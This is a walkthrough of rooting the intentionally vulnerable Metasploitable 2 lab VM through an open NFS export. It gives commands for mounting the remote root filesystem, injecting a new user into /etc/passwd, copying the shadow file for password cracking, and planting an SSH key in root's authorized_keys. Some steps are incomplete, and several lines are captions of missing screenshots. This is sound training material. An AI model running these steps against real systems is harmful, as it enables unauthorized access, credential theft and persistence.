Exploiting Metasploitable Without Metasploit — NFS Enumeration and Exploiting Misconfiguration

An nmap scan of the Metasploitable 2 VM shows that NFS ports are open. Running the nfs scripts that come with nmap give us enough info to know that this is an easy avenue for gaining control of the box:

nmap -v -sS -p 111 --script nfs*
111/tcp open rpcbind
| nfs-ls: Volume /
| access: Read Lookup Modify Extend Delete NoExecute
| drwxr-xr-x 0 0 4096 2012-05-14T03:35:33 bin
| drwxr-xr-x 0 0 4096 2017-07-05T01:02:05 home
| drwxr-xr-x 0 0 4096 2010-03-16T22:57:40 initrd
| lrwxrwxrwx 0 0 32 2010-04-28T20:26:18 initrd.img
| drwxr-xr-x 0 0 4096 2012-05-14T03:35:22 lib
| drwx------ 0 0 16384 2010-03-16T22:55:15 lost+found
| drwxr-xr-x 0 0 4096 2010-03-16T22:55:52 media
| drwxr-xr-x 0 0 4096 2010-04-28T20:16:56 mnt
| drwxr-xr-x 0 0 4096 2012-05-14T01:54:53 sbin
| drwxr-xr-x 0 0 4096 2010-04-28T04:06:37 usr

| nfs-showmount:
|_ / *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ / 7282168.0 1565724.0 5349444.0 23% 2.0T 32000

All indications are that we have access to the root of the filesystem. First we’ll create a folder to mount the drive on our Kali box and then use the mount command:

mkdir /mnt/metasploitable
mount -t nfs /mnt/metasploitable/
Write Access to Metasploitable Filessytem via NFS

With full write access to the box there are a few different ways we can turn that into root access.

Since we have root access to the file system, we can manually add a user by modifying /etc/passwd. First we’ll need to generate an md5crypt hash that will represent the new user’s password. Openssl can create the hash for us with the following command:

openssl passwd -1 password

In the command above replace “password” with whatever you want the new user’s password to be. The output will look like this:

openssl passwd -1 password

We’ll take that and using /etc/shadow as a reference, create a new line in /etc/passwd that adds user2 and then also create user2’s home directory. First make sure you are using the next available unique identifier for user/group and then echo the lines needed into the passwd and group files:

# Check for the unique identifiers in use:
cat /mnt/metasploitable/etc/passwd | cut -d ":" -f 3 | sort -V
# Update /etc/passwd
echo 'user2:$1$PgYGmDGT$ZMA4hIY4So5It35ald2JL.:1003:1003:just a user,111,,:/home/user2:/bin/bash' >> /mnt/metasploitable/etc/passwd
# Update /etc/group
echo 'user2:x:1003' >> /mnt/metasploitable/etc/group
# Make user2’s home directory
mkdir /mnt/metasploitable/home/user2

At this point everything is in place to ssh to the box:

Manually Adding a User and SSHing into the Box

Obviously root access is preferable. We could just repeat the same task as above, but in a real world scenario someone will (or should) notice pretty quickly if the root password changes. Another option is checking /etc/sudoers to see who has sudo access:

So we’ll add user2 to the admin group and the next time we log in we have sudo access:

Add user2 to the admin group
user2 with full sudo access

Let’s copy off the passwd and shadow files to our Kali box and use John to see if any of the passwords are crackable. We’ll use a tool called unshadow to combine the passwd and shadow files into a format that john will use to crack the passwords.

mkdir /tmp/metasploitable
cd /tmp/metasploitable
cp /mnt/metasploitable/etc/passwd passwd
cp /mnt/metasploitable/etc/shadow shadow
unshadow passwd shadow > unshadowed.txt

John was able to accurately identify the hash type and crack several passwords right away. Since this isn’t meant to be a john tutorial I won’t dive into all the potential options available to us, other than to say that you may need to tweak the hash setting with “ — format” if you know that john has identified the hash type incorrectly and “ — wordlist” can be used to try wordlists other than the default.

John the Ripper Cracking Several Metasploitable Passwords

With the msfadmin password cracked we have root access:

The third way to gain root access is to add the attacker’s ssh key to the authorized_keys file on the victim:

cat ~/.ssh/id_rsa.pub >> /mnt/metasploitable/root/.ssh/authorized_keys